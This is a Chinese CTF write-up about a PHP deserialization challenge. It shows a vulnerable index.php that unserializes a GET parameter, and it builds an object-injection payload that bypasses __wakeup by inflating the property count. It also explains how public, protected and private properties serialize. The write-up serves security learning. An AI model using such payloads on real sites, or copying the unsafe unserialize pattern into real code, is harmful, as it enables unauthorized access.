知識點:PHP序列化與反序列化,最下方有幾個擴展可以看一下
他說備份了,就肯定掃目錄,把源文件備份掃出來
dirsearch掃目錄掃到www.zip壓縮包
然後解壓發現是,序列化。
具體特徵如下:
index.php包含如下代碼:接收參數,進行序列化
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
class.php含: 源碼都放在着
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
開始構造
聲明一個Name類,包含username,password,且兩個變量都是private修飾,整句話都有用。
然後根據判斷句得知,username必須是admin,password必須是100所以,構造序列化
O是對象,s是字符串,i是數字
因爲是private修飾的所以要加%00充當空格
構造:O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
payload:url+?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
下面是拓展+答疑:
我看大佬的payload的時候,很疑惑爲什麼要寫%00Name%00username這樣的形式?
然後我進行了三種修飾方式的測試:public,protected,private
我忽然明白:
只有public修飾的不用太多的修飾原生態構造就好,而private需要加%00Name%00,
protected則需要使用 %00*%00username這樣的方式
protected修飾變量,運行後回顯代碼內註釋內容
<?php
class Name{
protected $username = 'nonono';////////////////看這兩行
protected $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//看這看這看這看這!!!!!!!!!
//運行會輸出 O:4:"Name":2:{s:11:" * username";s:5:"admin";s:11:" * password";i:100;}
?>
public修飾變量,運行後回顯代碼內註釋內容
<?php
class Name{
public $username = 'nonono';
public $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
?>
private修飾變量,運行後回顯代碼內註釋內容
<?php
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name('admin',100);
$b=serialize($a);
echo $b;
//O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
?>